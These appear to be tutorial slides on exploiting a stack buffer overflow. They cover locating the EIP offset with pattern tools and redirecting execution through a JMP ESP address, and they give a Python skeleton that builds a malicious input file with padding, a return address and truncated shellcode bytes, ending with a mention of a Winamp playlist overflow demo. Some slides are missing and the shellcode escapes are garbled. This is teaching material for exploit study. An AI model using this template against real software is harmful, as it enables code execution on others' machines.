6. Step2 : Verify the bug
Where is the EIP ?
Use a debugger to guide your self
Used different inputs to limit the range
of your expectations.
Use unique patterns to find exactly
where the file is
“./pattern_create.rb <size>“
/pattern_offset.rb <Data written in EIP>
<Size>
You've got the EIP... Sweet!
7. Now what?
No that you have the EIP you should
be able to overwrite it with an
address where you have your evil <no?
> code.
We call this the shell code.
a shellcode is a small piece of code
used as the payload in the
exploitation of a software
vulnerability
Ok...WHERE!
8. Where?
Remeber when you overwrote your
EIP ? Why not use the rest of the
buffer to put it there? right
where the ESP is pointing
EIP ==> ESP “DMA nope!”
Use a jump op. From one of the
dlls ..
Google some resources for that ;)
12. Finalize:
#!/usr/bin/env python
buff = ‘A’ *26072
buff += ‘x3axf2xa8x01′ # EIP overwrite #JMP ESP address.
buff += ‘CCCC’ # 4 bytes of garbage
buff += "xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"x31xc0xacx3c.....” #your shellcode
f= open(some_file, ‘w’) #whatever how this will be an
input to a program
f.write(buff)
f.close()
13. Now Add it to your code
and you're done
Winamp remote buffer overflow exploit
live demo.
[this flaw is triggered when a audio file path is
specified, inside a playlist, that consists of a UNC
path with a long computer name. This module delivers the
playlist via the browser]